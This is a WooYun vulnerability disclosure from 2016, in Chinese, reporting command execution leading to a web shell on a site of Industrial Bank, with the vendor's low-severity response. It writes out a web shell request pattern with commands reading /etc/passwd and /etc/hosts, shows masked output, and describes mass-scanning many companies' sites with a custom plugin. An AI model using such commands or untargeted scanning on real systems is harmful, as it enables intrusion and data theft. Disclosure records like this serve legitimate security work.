当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0213455

漏洞标题:金融安全之兴业银行某站命令导致getshell

相关厂商:cib.com.cn

漏洞作者: 路人甲

提交时间:2016-05-27 15:09

修复时间:2016-07-11 18:00

公开时间:2016-07-11 18:00

漏洞类型:命令执行

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-27: 细节已通知厂商并且等待厂商处理中
2016-05-27: 厂商已经确认,细节仅向厂商公开
2016-06-06: 细节向核心白帽子及相关领域专家公开
2016-06-16: 细节向普通白帽子公开
2016-06-26: 细节向实习白帽子公开
2016-07-11: 细节向公众公开

简要描述:

论插件的重要性
写了一个插件,投tangscan已重复,自己写了个脚本遍历了很多大公司的网站,然后批量去测试该插件的命中率。刚好发现该银行有这个漏洞...
插件还在跑,等找到漏洞了继续提交吧

详细说明:

233.png


mask 区域
1.http://**.**.**/  漏洞地址_
**********
2.http://**.**.**/1.jsppwd=023&i=ifconfig_
**********
*****et HWaddr 00:*****
***** Bcast:168.3.23.2*****
*****50:56ff:feaa:73*****
*****G MULTICAST MT*****
*****errors:0 dropped*****
*****rors:0 dropped:0 *****
*****s:0 txqueu*****
*****3 GiB) TX bytes:2*****
**********
*****cap:Local*****
*****27.0.0.1 M*****
*****r: ::1/128*****
*****UNNING MTU:*****
*****rors:0 dropped:*****
*****rs:0 dropped:0 o*****
*****ons:0 txq*****
*****.3 MiB) TX byt*****
**********
**********
**********
3.http://**.**.**/1.jsppwd=023&i=cat%20/etc/passwd_
**********
*****:/root:/*****
*****bin:/sbi*****
*****:/sbin:/sb*****
*****r/adm:/sb*****
*****ool/lpd:/s*****
*****:/sbin:/*****
*****wn:/sbin:/s*****
*****:/sbin:/*****
*****/spool/mail*****
*****spool/uucp:/*****
*****tor:/root:/*****
*****/usr/games:*****
*****var/gopher:/*****
*****/var/ftp:/s*****
*****body:/:/s*****
*****sage bus:/:/*****
*****muxd user:/*****
*****memory owner:/d*****
*****/var/cache/rpc*****
*****eKit:/proc:/*****
*****Stack:/var/lib/avah*****
*****c/abrt:/sb*****
***** daemon:/:/*****
***** User:/var/lib*****
***** NFS User:/var/li*****
*****ib/gdm:/sb*****
*****/ntp:/sbi*****
*****:/var/www:/*****
*****r":/var/empty/*****
*****pool/postfix*****
*****ver:/var/lib*****
***** Daemon:/var/run/*****
*****t:/home/xgu*****
*****r:/home/sabayo*****
*****d SSH:/var/empty*****
*****::/:/sbi*****
*****be used by OProfile:/*****
*****ome/dev:/*****
*****home/zabbi*****
*****/ucp/cib*****
**********
**********
**********
4.http://**.**.**/1.jsppwd=023&i=cat%20/etc/hosts_
**********
*****domain localhost4 l*****
*****domain localhost6 l*****
*****9 name*****
*****0 data*****
*****5 UCP-*****
**********
*****ATALK UAT-*****
*****5 UAT*****
*****9 UAT*****

漏洞证明:

修复方案:

补丁

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2016-05-27 17:50

厂商回复:

该漏洞为测试系统漏洞,暂未涉及业务数据。

最新状态:

暂无